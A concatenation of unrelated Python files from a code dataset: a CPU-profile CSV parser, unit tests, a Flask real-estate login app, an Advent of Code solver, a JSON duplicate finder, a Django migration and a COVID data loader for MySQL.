Monitor' )\r\nparser.add_argument( '-o', '--out', metavar='outputFile', nargs='?', help='Output csv file' )\r\nargs = parser.parse_args()\r\nfT = open( args.thread, 'r' )\r\nfM = open( args.monitor, 'r' )\r\ntry:\r\n fO = open( args.out, 'w' ) if args.out else sys.stdout\r\nexcept IOError:\r\n # Open args.out file error\r\n fO = sys.stdout\r\n\r\n# Parse thread log\r\n# print(\"From {}\".format(args.thread), end='\\r\\n')\r\npLog = re.compile( r\".*Thread Start \\( name: (.*) id: (.*) p: (.*)\" )\r\nadrsList = []\r\nnameList = []\r\nidx = 0\r\nfor line in fT:\r\n m = pLog.match( line )\r\n if m:\r\n address = int( m.group(2), 16 )\r\n adrsList.append( str(address) )\r\n nameList.append( m.group(1) )\r\n print( \"{0}, {1}\".format(adrsList[idx], nameList[idx]), end='\\r\\n' )\r\n idx = idx + 1\r\n\r\n# Replace csv report\r\n# print(\"From {}\".format(args.monitor), end='\\r\\n')\r\npName = re.compile( r\"GRM_Nav\" )\r\npID = re.compile( r\"ID Thread\" )\r\nlist1 = []\r\nlist2 = []\r\nfor line in fM:\r\n gotName = pName.search( line )\r\n gotID = pID.search( line )\r\n if gotName:\r\n # Name list\r\n list1 = line.split( ',' )\r\n list1.remove('\\n')\r\n elif gotID:\r\n # ID list\r\n for i in range( idx ):\r\n line = line.replace( adrsList[i], nameList[i] )\r\n line = line.replace( \".000\", \"\" )\r\n list2 = line.split( ',' )\r\n list2.remove('\\n')\r\n else:\r\n # Other lines\r\n fO.write( line )\r\n\r\ntemp = zip( list1, list2 )\r\nfor i in temp:\r\n fO.write( \"{0}, {1}\\n\".format(i[0], i[1]) )\r\n\r\n# Close file objects\r\nfT.close()\r\nfM.close()\r\nif fO != sys.stdout:\r\n fO.close()\r\n","sub_path":"others/garmin/CPU_profile/parse-csv.py","file_name":"parse-csv.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"135415300","text":"import unittest\nimport sys\nimport os\nsys.path.append(os.path.join(os.path.dirname(__file__), \"..\", \"..\"))\n\n# logging\n# import logging\n# logging.basicConfig(level=logging.DEBUG)\n\n# module imports\nfrom malcolm.controllers.hellocontroller import HelloController\nfrom malcolm.core.block import Block\nfrom malcolm.core.process import Process\nfrom malcolm.core.syncfactory import SyncFactory\nfrom malcolm.core.request import Request\n\n\nclass TestSystemCore(unittest.TestCase):\n\n def test_hello_controller_good_input(self):\n block = Block(\"hello\")\n HelloController(block)\n result = block.say_hello(name=\"me\")\n self.assertEquals(result[\"greeting\"], \"Hello me\")\n\n def test_hello_controller_with_process(self):\n sync_factory = SyncFactory(\"sched\")\n process = Process(\"proc\", sync_factory)\n block = Block(\"hello\")\n HelloController(block)\n process.add_block(block)\n process.start()\n q = sync_factory.create_queue()\n req = Request.Post(response_queue=q, context=\"ClientConnection\",\n endpoint=[\"hello\", \"say_hello\"],\n parameters=dict(name=\"thing\"))\n req.set_id(44)\n process.q.put(req)\n resp = q.get(timeout=1)\n self.assertEqual(resp.id_, 44)\n self.assertEqual(resp.context, \"ClientConnection\")\n self.assertEqual(resp.type_, \"Return\")\n self.assertEqual(resp.value, dict(greeting=\"Hello thing\"))\n\nif __name__ == \"__main__\":\n unittest.main(verbosity=2)\n","sub_path":"tests/test_core/test_system_core.py","file_name":"test_system_core.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"296981686","text":"import os, re\nfrom model import *\nfrom flask import Flask, session, request, flash, url_for, redirect, render_template, abort, jsonify\n# import flask_login\nfrom flask_login import LoginManager, login_user, logout_user, current_user, login_required\nfrom functools import wraps\n\n\napp = Flask(__name__)\n\ndef login_required(userinput):\n\t@wraps(userinput)\n\tdef wrap(*args, **kwargs):\n\t\tif 'logged_in' in session:\n\t\t\treturn userinput(*args, **kwargs)\n\t\telse:\n\t\t\tflash(\"You need to login first.\")\n\t\t\treturn redirect('/login')\n\treturn wrap\n\n# =====================================================================================================\n# Routes ==============================================================================================\n# =====================================================================================================\n\n@app.route(\"/\", methods=['POST','GET'])\ndef index():\n\temail = ''\n\tif session.get('logged_in'):\n\t\temail = session.get('email')\n\t\tprint(\"session logged in = true\")\n\t\treturn redirect(\"/home\")\n\telse:\n\t\tprint(\"session logged in = false\")\n\t\treturn redirect(\"/login\")\n\n@app.route(\"/dashboard\", methods=['POST','GET'])\n@login_required\ndef dashboard():\n\ttitle = \"Main Dashboard\"\n\treturn render_template(\"main.html\",\n\t\ttitle = title)\n\n@app.route(\"/login\", methods=['POST','GET'])\ndef login():\n\terror_msg = \"\"\n\tif request.method == 'POST':\n\t\temail = request.form.get('email')\n\t\tpassword = request.form.get('password')\n\t\tuser = User.query.filter_by(email=email).first()\n\t\tprint(\"email:\", email)\n\t\tprint(\"user:\", user)\n\t\tif user:\n\t\t\tprint(\"user.check_password(password):\", user.check_password(password))\n\t\t\tif user.check_password(password):\n\t\t\t\tsession['logged_in'] = True\n\t\t\t\tsession['firstname'] = user.firstname\n\t\t\t\tsession['id'] = user.id\n\t\t\t\tprint(\"/Login: successfully logged in\")\n\t\t\t\treturn redirect('/home')\n\t\terror_msg = \"Incorrect email/password. Please try again.\"\n\treturn render_template(\"login.html\", error_msg = error_msg)\n\n\n@app.route(\"/register\", methods = ['GET', 'POST'])\ndef register():\n\tif request.method == 'GET':\n\t\treturn render_template('register.html')\n\tuser = User(request.form['email'], request.form['password'], request.form['firstname'], request.form['lastname'])\n\tdb.session.add(user)\n\tdb.session.commit()\n\tprint(\"User successfully added.\")\n\treturn redirect('/login')\n\n@app.route(\"/logout\")\n@login_required\ndef logout():\n\tsession.clear()\n\tprint(\"User logged out.\")\n\treturn redirect('/login')\n\n@app.route(\"/home\", methods=['GET','POST'])\n@login_required\ndef home():\n\treturn render_template('home.html')\n\n\n@app.route(\"/org_dashboard\", methods=['GET','POST'])\n@login_required\ndef org_dashboard():\n\ttitle = \"Original Dashboard\"\n\treturn render_template(\"org_dashboard.html\",\n\t\ttitle = title)\n\n@app.route(\"/proforma\", methods=['GET','POST'])\n@login_required\ndef proforma():\n\ttitle = \"Pro Forma\"\n\treturn render_template(\"proforma.html\",\n\t\ttitle=title)\n\n@app.route('/returns_summary', methods=['GET','POST'])\n@login_required\ndef return_sum():\n\ttitle = \"Returns Summary\"\n\treturn render_template('returns_summary.html',\n\t\ttitle=title)\n\n@app.route('/inputform')\n@login_required\ndef inputForm():\n\ttitle=\"Input Form\"\n\treturn render_template('input_form.html',\n\t\ttitle = title)\n\n@app.route('/savedata',methods = [\"POST\"])\n@login_required\ndef save_data():\n\tprint('='*50+\" start save\")\n\tobject1 = 'object'\n\tmarket_counter = 1\n\tmarket_rental_input_counter = 1\n\trental_rate_counter = 1\n\t# rental rate lists\n\tproj_rents_list = []\n\ttotal_units_list = []\n\tavg_sf_per_unit_list = []\n\trent_per_unit_list = []\n\t# market rental lists\n\trevenue_list = []\n\texpenses_list = []\n\tvacancy_list = []\n\tconcession_list = []\n\tcredit_loss_list = []\n\t# static inputs\n\tsave = RealEstateModel(datetime.utcnow(),\n\t\t\t\trequest.form['save_name'],\n\t\t\t\trequest.form['Analysis_Start_Date'],\n\t\t\t\trequest.form['Property_Name'],\n\t\t\t\trequest.form['Property_Address'],\n\t\t\t\trequest.form['Property_Type'],\n\t\t\t\trequest.form['Purchase_Price'],\n\t\t\t\trequest.form['Closing_Costs_Percentage'],\n\t\t\t\trequest.form['Sale_Year'],\n\t\t\t\trequest.form['Terminal_Cap_Rate'],\n\t\t\t\trequest.form['Sales_Costs'],\n\t\t\t\trequest.form['Leverage'],\n\t\t\t\trequest.form['Interest_Rate_on_Mortgage'],\n\t\t\t\trequest.form['Loan_Term'],\n\t\t\t\trequest.form['Loan_Amortization'],\n\t\t\t\t'5',# request.form['UL_Discount_Rate'],\n\t\t\t\t'8',# request.form['L_Discount_Rate'],\n\t\t\t\trequest.form['Other_Income_Total'],\n\t\t\t\trequest.form['Less_Vacancy'],\n\t\t\t\trequest.form['Less_Concessions'],\n\t\t\t\trequest.form['Less_Credit_Loss'],\n\t\t\t\trequest.form['Real_Estate_Taxes_Total'],\n\t\t\t\trequest.form['Insurance_Total'],\n\t\t\t\trequest.form['Utilities_Total'],\n\t\t\t\trequest.form['Payroll_Total'],\n\t\t\t\trequest.form['Repairs_and_Maintenance_Total'],\n\t\t\t\trequest.form['Contract_Services_Total'],\n\t\t\t\trequest.form['Turnover_Total'],\n\t\t\t\trequest.form['Sales_and_Marketing_Total'],\n\t\t\t\trequest.form['Administrative_Total'],\n\t\t\t\trequest.form['Management_Percentage'],\n\t\t\t\trequest.form['Replacement_Reserves_Percentage'],\n\t\t\t\tsession['id'])\n\n\tdb.session.add(save)\n\t# db.session.commit()\n\n\n\n\twhile True:\n\t\tif not request.form.get('total_units'+str(rental_rate_counter)):\n\t\t\tbreak\n\t\tproj_rents_list.append(request.form['proj_rents'+str(rental_rate_counter)])\n\t\ttotal_units_list.append(request.form['total_units'+str(rental_rate_counter)])\n\t\tavg_sf_per_unit_list.append(request.form['avg_sf_per_unit'+str(rental_rate_counter)])\n\t\trent_per_unit_list.append(request.form['rent_per_unit'+str(rental_rate_counter)])\n\t\trental_rate_counter += 1\n\n\twhile True:\n\t\tif not request.form.get('mkt_rent_revenue'+str(market_counter)):\n\t\t\tprint('break')\n\t\t\tbreak\n\t\trevenue_list.append(request.form['mkt_rent_revenue'+str(market_counter)])\n\t\texpenses_list.append(request.form['mkt_rent_expenses'+str(market_counter)])\n\t\tvacancy_list.append(request.form['mkt_rent_vacancy'+str(market_counter)])\n\t\tconcession_list.append(request.form['mkt_rent_concessions'+str(market_counter)])\n\t\tcredit_loss_list.append(request.form['mkt_rent_credit_loss'+str(market_counter)])\n\t\tmarket_counter += 1\n\t\tprint(market_counter)\n\n\n\tprint('proj_rents_list: ',proj_rents_list)\n\tprint('total_units_list: ',total_units_list)\n\tprint('avg_sf_per_unit_list: ',avg_sf_per_unit_list)\n\tprint('rent_per_unit_list: ',rent_per_unit_list)\n\n\t# while market_rental_input_counter <= len(revenue_list):\n\n\n\tprint('revenue_list: ',revenue_list)\n\tprint('expenses_list: ',expenses_list)\n\tprint('vacancy_list: ',vacancy_list)\n\tprint('concession_list: ',concession_list)\n\tprint('credit_loss_list: ',credit_loss_list)\n\n\treturn jsonify(success = 'success')\n\n\n\n\nif __name__ == \"__main__\":\n\tapp.secret_key = os.urandom(12)\n\tapp.run(port=3000,debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"618649446","text":"instructions = open('day7.txt', 'r').read().split('\\n')\n\nnodes = []\nfor instruction in instructions:\n\tnodes.append([instruction.split(' ')[-1], None])\n\ndef nodeValue( str ):\n\tfor node in nodes:\n\t\tif node[0] == str:\n\t\t\treturn node[1]\n\ndef nodeIndex( str ):\n\tindex = 0\n\tfor node in nodes:\n\t\tif node[0] == str:\n\t\t\treturn index\n\t\tindex += 1\n\nwhile ([value for node in nodes for value in node].count(None)) > 0:\n\tfor instruction in instructions:\n\t\twords = instruction.split(' ')\n\t\tif (nodeValue(words[-1]) == None):\n\t\t\tif (len(words) == 3):\n\t\t\t\ttry:\n\t\t\t\t\tinput1 = int(words[0])\n\t\t\t\texcept ValueError:\n\t\t\t\t\tinput1 = nodeValue(words[0])\n\t\t\t\tnodes[nodeIndex(words[2])][1] = input1\n\t\t\telif (len(words) == 4):\n\t\t\t\ttry:\n\t\t\t\t\tinput1 = int(words[1])\n\t\t\t\texcept ValueError:\n\t\t\t\t\tinput1 = nodeValue(words[1])\n\t\t\t\tnodes[nodeIndex(words[3])][1] = None if (input1 == None) else (65535 - int(input1))\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tinput1 = int(words[0])\n\t\t\t\texcept ValueError:\n\t\t\t\t\tinput1 = nodeValue(words[0])\n\t\t\t\ttry:\n\t\t\t\t\tinput2 = int(words[2])\n\t\t\t\texcept ValueError:\n\t\t\t\t\tinput2 = nodeValue(words[2])\n\t\t\t\tif (words[1]=='OR'):\n\t\t\t\t\tnodes[nodeIndex(words[4])][1] = None if ((input1 == None) | (input2 == None)) else (int(input1) | int(input2))\n\t\t\t\telif (words[1]=='AND'):\n\t\t\t\t\tnodes[nodeIndex(words[4])][1] = None if ((input1 == None) | (input2 == None)) else (int(input1) & int(input2))\n\t\t\t\telif (words[1]=='LSHIFT'):\n\t\t\t\t\tnodes[nodeIndex(words[4])][1] = None if (input1 == None) else (int(input1) << input2)\n\t\t\t\telse:\n\t\t\t\t\tnodes[nodeIndex(words[4])][1] = None if (input1 == None) else (int(input1) >> input2)\n\t#print ([value for node in nodes for value in node].count(None))\nprint (nodeValue('a'))","sub_path":"adventcode_day7a.py","file_name":"adventcode_day7a.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"505313134","text":"#!/usr/bin/env python3\n\n\"\"\"\nCreated on 3 Mar 2019\n\n@author: Bruno Beloff (bruno.beloff@southcoastscience.com)\n\nsource repo: scs_analysis\n\nDESCRIPTION\nThe sample_duplicates utility is used to find duplicate values in a sequence of input JSON documents, optionally\nfor a specified node path. It is particularly useful in searching for duplicate recording datetimes.\n\nIf an input document does not contain the specified path, then it is ignored.\n\nIn the default mode, the utility outputs the rows that were duplicates (or contained duplicate field values). If the\n--exclude flag is set, then sample_duplicates generates a version of the input data that contains no duplicates.\n\nIn the --counts mode, the output report is sequence of JSON dictionaries with a field for each value where duplicates\nwere found, whose value is the number of matching documents.\n\nSYNOPSIS\nsample_duplicates.py [{ -x | -c }] [-v] [PATH]\n\nEXAMPLES\ncsv_reader.py climate.csv | sample_duplicates.py -v val.hmd\n\nDOCUMENT EXAMPLE - OUTPUT\ndefault mode:\n{\"val\": {\"hmd\": 17.5, \"tmp\": 25.7}, \"rec\": \"2019-02-25T15:28:18Z\", \"tag\": \"scs-bgx-303\"}\n{\"val\": {\"hmd\": 17.5, \"tmp\": 25.7}, \"rec\": \"2019-02-25T15:31:18Z\", \"tag\": \"scs-bgx-303\"}\n\ncounts mode:\n{\"17.5\": 2}\n\"\"\"\n\nimport sys\n\nfrom scs_analysis.cmd.cmd_sample_duplicates import CmdSampleDuplicates\n\nfrom scs_core.data.duplicates import Duplicates\nfrom scs_core.data.path_dict import PathDict\n\nfrom scs_core.sys.logging import Logging\n\n\n# --------------------------------------------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n\n dupes = None\n\n document_count = 0\n processed_count = 0\n\n # ----------------------------------------------------------------------------------------------------------------\n # cmd...\n\n cmd = CmdSampleDuplicates()\n\n if not cmd.is_valid():\n cmd.print_help(sys.stderr)\n exit(2)\n\n Logging.config('sample_duplicates', verbose=cmd.verbose)\n logger = Logging.getLogger()\n\n logger.info(cmd)\n\n try:\n # ------------------------------------------------------------------------------------------------------------\n # resources...\n\n dupes = Duplicates()\n non_dupes = []\n\n # ------------------------------------------------------------------------------------------------------------\n # run...\n\n for line in sys.stdin:\n jstr = line.strip()\n datum = PathDict.construct_from_jstr(jstr)\n\n if datum is None:\n continue\n\n document_count += 1\n\n if not datum.has_sub_path(cmd.path):\n continue\n\n is_duplicate = dupes.test(document_count, datum.node(cmd.path), datum)\n\n if not cmd.counts:\n if cmd.exclude:\n if not is_duplicate:\n non_dupes.append(jstr)\n else:\n if is_duplicate:\n print(jstr)\n\n processed_count += 1\n\n\n # ------------------------------------------------------------------------------------------------------------\n # report...\n\n if cmd.exclude:\n for datum in non_dupes:\n print(datum)\n\n if cmd.counts:\n for count in dupes.match_counts():\n print(count)\n\n\n # ----------------------------------------------------------------------------------------------------------------\n # end...\n\n except KeyboardInterrupt:\n print(file=sys.stderr)\n\n finally:\n logger.info(\"documents: %d processed: %d\" % (document_count, processed_count))\n logger.info(\"values with duplicates: %d total duplicates: %d\" % (dupes.matched_key_count, dupes.total_matches))\n","sub_path":"src/scs_analysis/sample_duplicates.py","file_name":"sample_duplicates.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"194117979","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('kontrahent', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Catkli',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n ('nazwa', models.CharField(max_length=60, default='gotówka')),\n ('slug', models.SlugField(blank=True, max_length=66)),\n ],\n options={\n 'ordering': ('nazwa',),\n },\n ),\n migrations.CreateModel(\n name='Detale',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n ('rabatz', models.DecimalField(blank=True, max_digits=4, decimal_places=2)),\n ('rabatr', models.DecimalField(blank=True, max_digits=4, decimal_places=2)),\n ('kredytlimit', models.DecimalField(blank=True, max_digits=8, decimal_places=2)),\n ('peyment', models.PositiveIntegerField(blank=True, default=0)),\n ],\n ),\n migrations.CreateModel(\n name='Klient',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n ('nazwa', models.CharField(db_index=True, blank=True, max_length=30)),\n ('slug', models.SlugField(blank=True)),\n ('firma', models.CharField(max_length=80)),\n ('adres', models.CharField(max_length=60)),\n ('kodpocztowy', models.CharField(max_length=6)),\n ('rodzfirm', models.CharField(choices=[('działalność', 'Jednoosobowa działalność gospodarcza'), ('spółka cywilna', 'Spółka cywilna'), ('spółka jawna', 'Spółka jawna'), ('spółka komandytowa', 'Spółka komandytowa'), ('spółka zoo', 'Spółka z.o.o'), ('spółka akcyjna', 'Spółka akcyjna')], max_length=60, default='działalność')),\n ('nip', models.CharField(max_length=10)),\n ('krs', models.CharField(blank=True, max_length=10)),\n ('ceidg', models.CharField(blank=True, max_length=10)),\n ('regon', models.CharField(blank=True, max_length=9)),\n ('shortopis', models.CharField(blank=True, max_length=200)),\n ('opis', models.TextField(blank=True)),\n ('link2', models.URLField(blank=True)),\n ('status', models.CharField(choices=[('aktywny', 'aktywny'), ('ban', 'ban')], max_length=20, default='aktywny')),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('updated', models.DateTimeField(auto_now=True)),\n ('catkli', models.ForeignKey(to='klient.Catkli', related_name='klients')),\n ('miejscowosc', models.ForeignKey(related_name='klientos', blank=True, to='kontrahent.Miejscowosc')),\n ],\n options={\n 'ordering': ('nazwa',),\n },\n ),\n migrations.CreateModel(\n name='Lokacja',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n ('nazwa', models.CharField(db_index=True, max_length=40)),\n ('slug', models.SlugField(blank=True)),\n ('adres', models.CharField(max_length=60)),\n ('kodpocztowy', models.CharField(max_length=6)),\n ('dzienodciecia', models.CharField(max_length=15)),\n ('godzdostawy', models.CharField(max_length=15)),\n ('shortopis', models.CharField(blank=True, max_length=100)),\n ('link1', models.URLField(blank=True)),\n ('link2', models.URLField(blank=True)),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('updated', models.DateTimeField(auto_now=True)),\n ('klient', models.ForeignKey(to='klient.Klient', related_name='lokacjas')),\n ('miejscowosc', models.ForeignKey(related_name='lokacjas', blank=True, to='kontrahent.Miejscowosc')),\n ],\n options={\n 'ordering': ('nazwa',),\n },\n ),\n migrations.AddField(\n model_name='detale',\n name='klient',\n field=models.OneToOneField(related_name='detales', to='klient.Klient'),\n ),\n ]\n","sub_path":"klient/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"638659119","text":"import json\nimport requests\nimport os\nimport MySQLdb\nfrom datetime import datetime, timedelta\n \n#\thttps://likegeeks.com/downloading-files-using-python/\n#\thttps://stackoverflow.com/questions/12965203/how-to-get-json-from-webpage-into-python-script\n#\thttps://mysqlclient.readthedocs.io/user_guide.html\n#\thttps://stackoverflow.com/questions/441147/how-to-subtract-a-day-from-a-date\n\n# JSON date not older than 2 day is not accurate and can change\ndateToInsert = datetime.today() - timedelta(days=2)\ndateToInsert = dateToInsert.strftime('%Y-%m-%d')\n\n\nurlCase = \"https://epistat.sciensano.be/Data/COVID19BE_CASES_AGESEX.json\"\nurlHosp = \"https://epistat.sciensano.be/Data/COVID19BE_HOSP.json\"\nurlDeath = \"https://epistat.sciensano.be/Data/COVID19BE_MORT.json\"\nurlTest = \"https://epistat.sciensano.be/Data/COVID19BE_tests.json\"\n\n\n\ndb = MySQLdb.connect(host=\"127.0.0.1\",db=\"coviddb\", read_default_file=\"/etc/mysql/my.cnf\");\ncur = db.cursor()\n\n\ndef url_getJSON(url):\n try:\n with requests.get(url) as r:\n data = r.json()\n return data\n except:\n print(f\"Error loading {url}\")\n exit()\t\n\n\ndef getProvinceID(provinceName):\n\tcur.execute(f'SELECT provinceID FROM provinces WHERE provinceName = \\'{provinceName}\\'')\n\tresult = cur.fetchone()\n\treturn result[0]\n\t\n\t\ndef getRegionID(regionName):\n\tcur.execute(f'SELECT regionID FROM regions WHERE regionName = \\'{regionName}\\'')\n\tresult = cur.fetchone()\n\treturn result[0]\n\n# ------------------------------\n# Start function read json tests \ndef readTest():\n\tdataset = url_getJSON(urlTest)\n\t# Iteratie through every JSON object\n\tfor data in dataset:\n\t\ttry:\n\t\t\tdate = data['DATE']\n\t\t\ttestAll = data['TESTS_ALL']\n\t\t\ttestPos = data['TESTS_ALL_POS']\n\t\t\t# If an error occurs in reading the JSON, stop the reading\n\t\t\t\n\t\t\t# If the key 'PROVINCE' exists\n\t\t\tif ('PROVINCE' in data):\n\t\t\t\t# Get provinceID & regionID\n\t\t\t\tprovinceID = getProvinceID(data['PROVINCE'])\n\t\t\t\tregionID = getRegionID(data['REGION'])\n\t\t\t\t\t\n\n\t\t\t\t#Check if the object already exists\n\t\t\t\tsql = 'SELECT * FROM tests WHERE testDate = %s AND testProvinceID = %s AND testRegionID = %s'\n\t\t\t\tval = (date,provinceID,regionID)\n\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\n\t\t\t\t# If the object does not exists, insert into db\n\t\t\t\tif (cur.rowcount == 0):\n\t\t\t\t\t# Check if date is older than 2 days from now\n\t\t\t\t\tif (date < dateToInsert):\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tsql = \"INSERT INTO tests(testDate,testProvinceID,testRegionID,testAll,testPos) VALUES (%s,%s,%s,%s,%s)\"\n\t\t\t\t\t\t\tval = (date,provinceID,regionID,testAll,testPos)\n\t\t\t\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\t\t\tdb.commit()\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tprint(\"Error (101) - inserting test\")\n\t\t\t\t\t\t\t\n\t\t\t# If regionID & provinceID do not exist\n\t\t\telse:\n\t\t\t\t#Check if object exists\n\t\t\t\tsql = \"SELECT * FROM tests WHERE testDate = %s AND testProvinceID = %s AND testRegionID = %s\"\n\t\t\t\tval = (data['DATE'], '1', '1')\n\t\t\t\tcur.execute(sql,val)\n\t\t\t\tif (cur.rowcount == 0):\n\t\t\t\t\t# Check if date is older than 2 days from now\n\t\t\t\t\tif (date < dateToInsert):\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tsql = \"INSERT INTO tests(testDate,testProvinceID,testRegionID,testAll,testPos) VALUES (%s,%s,%s,%s,%s)\"\n\t\t\t\t\t\t\tval = (date,'1','1',testAll,testPos)\n\t\t\t\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\t\t\tdb.commit()\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tprint(\"Error(102) - inserting test\")\n\n\t\texcept:\n\t\t\tprint('JSON FILE IS BROKEN - '+urlTest)\n\t\t\texit()\n# End function read json tests\n# ------------------------------\n# Start function read json hosps\ndef readHosp():\n\tdataset = url_getJSON(urlHosp)\n\tfor data in dataset:\n\t\ttry:\n\t\t\thospDate = data['DATE']\n\t\t\thospProvinceID = getProvinceID(data['PROVINCE'])\n\t\t\thospRegionID = getRegionID(data['REGION'])\n\t\t\ttotalInHosp = data['TOTAL_IN']\n\t\t\ttotalInICU = data['TOTAL_IN_ICU']\n\t\t\ttotalInResp = data['TOTAL_IN_RESP']\n\t\t\tnewInHosp = data['NEW_IN']\n\t\t\tnewOutHosp = data['NEW_OUT']\n\t\t\t\n\t\t\t# Check if object already exists\n\t\t\tsql= 'SELECT * FROM hosps WHERE hospDate = %s AND hospProvinceID = %s AND hospRegionID = %s'\n\t\t\tval = (hospDate, hospProvinceID, hospRegionID)\n\t\t\tcur.execute(sql,val)\n\t\t\t\n\t\t\t# If object is not in DB, insert\n\t\t\tif (cur.rowcount == 0):\n\t\t\t\t#Check if data is older than 2 days from now\n\t\t\t\tif (hospDate < dateToInsert):\n\t\t\t\t\ttry:\n\t\t\t\t\t\tsql = \"INSERT INTO hosps(hospDate,hospProvinceID,hospRegionID,totalInHosp,totalInICU,totalInResp,newInHosp,newOutHosp) VALUES (%s,%s,%s,%s,%s,%s,%s,%s)\"\n\t\t\t\t\t\tval = (hospDate,hospProvinceID,hospRegionID,totalInHosp,totalInICU,totalInResp,newInHosp,newOutHosp)\n\t\t\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\t\tdb.commit()\n\t\t\t\t\texcept:\n\t\t\t\t\t\tprint(\"Error(102) - insertings hosps\")\n\t\t\t\t\t\t\n\t\texcept:\n\t\t\tprint('JSON FILE IS BROKEN - '+urlHosp)\n\t\t\texit()\n\t\t\t\n# End function read json hosps\n# -------------------------------\n# Start function read json deaths\ndef readDeath():\n\tdataset = url_getJSON(urlDeath)\n\tfor data in dataset:\n\t\ttry:\n\t\t\tspecialCase = 0\n\t\t\tdeathDate = data['DATE']\n\t\t\tdeathRegionID = getRegionID(data['REGION'])\n\t\t\tdeaths = data['DEATHS']\n\n\t\t\t# Check if key 'AGEGROUP' exists\n\t\t\tif ('AGEGROUP' in data):\n\t\t\t\tdeathAgeGroup = data['AGEGROUP']\n\t\t\telse:\n\t\t\t\tdeathAgeGroup = None\n\t\t\t\tspecialCase = 1\n\t\t\t\t\n\t\t\t# Check if key 'SEX' exists.\n\t\t\tif ('SEX' in data):\n\t\t\t\tdeathSex = data['SEX']\n\t\t\telse:\n\t\t\t\tdeathSex = None\n\t\t\t\tspecialCase = 1\n\t\t\t\n\t\t\t# The Select query is different if one or more values are None\n\t\t\tif (specialCase == 0):\n\t\t\t\tsql= 'SELECT * FROM deaths WHERE deathDate = %s AND deathRegionID = %s AND deathAgeGroup = %s AND deathSex = %s'\n\t\t\t\tval = (deathDate,deathRegionID,deathAgeGroup, deathSex)\n\t\t\t\tcur.execute(sql,val)\n\t\t\n\t\t\telse:\n\t\t\t\tif (deathAgeGroup == None and deathSex == None):\n\t\t\t\t\tsql = 'SELECT * FROM deaths WHERE deathDate = %s AND deathRegionID = %s AND deathAgeGroup IS NULL AND deathSex IS NULL'\n\t\t\t\t\tval = (deathDate,deathRegionID)\n\t\t\t\t\tcur.execute(sql,val)\n\t\t\t\telif (deathAgeGroup == None):\n\t\t\t\t\tsql = 'SELECT * FROM deaths WHERE deathDate = %s AND deathRegionID = %s AND deathAgeGroup IS NULL AND deathSex = %s'\n\t\t\t\t\tval = (deathDate,deathRegionID, deathSex)\n\t\t\t\t\tcur.execute(sql,val)\n\t\t\t\telse:\n\t\t\t\t\tsql = 'SELECT * FROM deaths WHERE deathDate = %s AND deathRegionID = %s AND deathAgeGroup = %s AND deathSex IS NULL'\n\t\t\t\t\tval = (deathDate,deathRegionID,deathAgeGroup)\n\t\t\t\t\tcur.execute(sql,val)\n\t\t\t\n\t\t\t# Check if the object already exists\n\t\t\tif (cur.rowcount == 0):\n\t\t\t\t\n\t\t\t\t#Check if data is older than 2 days from now\n\t\t\t\tif (deathDate < dateToInsert):\n\t\t\t\t\ttry:\n\t\t\t\t\t\tsql = 'INSERT INTO deaths(deathDate,deathRegionID,deathAgeGroup, deathSex, deaths) VALUES (%s,%s,%s,%s,%s)'\n\t\t\t\t\t\tval = (deathDate,deathRegionID,deathAgeGroup,deathSex,deaths)\n\t\t\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\t\tdb.commit()\n\n\t\t\t\t\texcept:\n\t\t\t\t\t\tprint(\"Error(102) - insertings deaths\")\n\t\t\t\t\t\t\n\t\texcept:\n\t\t\tprint('JSON FILE IS BROKEN - '+urlDeath)\n\t\t\texit()\n# End function read json deaths\n# ------------------------------\n# Start function read json cases\ndef readCase():\n\tdataset = url_getJSON(urlCase)\n\tfor data in dataset:\n\t\ttry:\n\t\t\tcases = data['CASES']\n\t\t\t\n\t\t\t# Check if key 'DATE' exists\n\t\t\tif ('DATE' in data):\n\t\t\t\tcaseDate = data['DATE']\n\t\t\telse:\n\t\t\t\tcaseDate = None\n\n\t\t\t# Check if key 'AGEGROUP' exists\n\t\t\tif ('AGEGROUP' in data):\n\t\t\t\tcaseAgeGroup = data['AGEGROUP']\n\t\t\telse:\n\t\t\t\tcaseAgeGroup = None\n\t\t\t\n\t\t\t# Check if 'PROVINCE' exists\n\t\t\tif ('PROVINCE' in data):\n\t\t\t\tif (data['PROVINCE'] == 'Liège'):\n\t\t\t\t\tcaseProvinceID = getProvinceID('Liège')\n\t\t\t\telse:\n\t\t\t\t\tcaseProvinceID = 